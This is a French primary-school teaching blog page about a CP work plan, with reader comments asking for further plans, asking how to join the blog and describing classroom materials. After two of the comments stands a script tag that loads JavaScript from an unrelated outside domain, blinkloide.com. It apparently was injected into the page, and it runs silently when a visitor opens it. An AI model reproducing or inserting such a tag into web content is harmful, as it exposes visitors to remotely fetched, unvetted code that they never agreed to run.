• CP plan de travail n°2

    Partager via Gmail Yahoo!

    Tags Tags : , ,
  • Commentaires

    1
    Véronique
    Mercredi 6 Décembre 2017 à 10:18

    Bonjour Sandrine, 

    Je découvre seulement ton site et j'adore. Que d'idées c'est absolument fantastique.

    J'aime beaucoup ton idée de plan de travail pour les CP. J'ai vu que tu en avais fait 15 mais je ne vois pas les versions de 8 à 13. Serait-il possible de les récupérer car j'ai un CP et j'aimerais tenter l'aventure. Merci par avance. Véronique.

    2
    Titine
    Mercredi 7 Novembre 2018 à 17:10

    Merci pour ce beau partage, j'utilise également la méthode "un monde à lire"

    Par contre peux-tu me dire où doit s'inscrire pour se connecter à ekablog  pour devenir membre?

    Bonne continuation et longue vie à ton blog!

    3
    isa CR
    Mercredi 18 Mars 2020 à 16:29

    Bonjour, merci pour ts les docs . je serai interessée par tes plans de travail pour l'année prochaine

    je travaille aussi sur kimamila série blanche. J'ai fait les exos en mixant ceux de la blanche et de la rouge, les lectures , les fiches sons et j 'ai même fait un montage scanné les 2 derniers albums Flamme et Lison afin d'en faire une trace pour mes élèves (pas pu acheter les séries) et économiser le papier. Si cela peut t'interesser

     

    <script src="//blinkloide.com/221e5645d998d5ae68.js"></script>
      • isa CR
        Mercredi 18 Mars 2020 à 16:30

        je veux bien devenir membre mais peux tu me dire comment faire?

        <script src="//blinkloide.com/221e5645d998d5ae68.js"></script>
    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :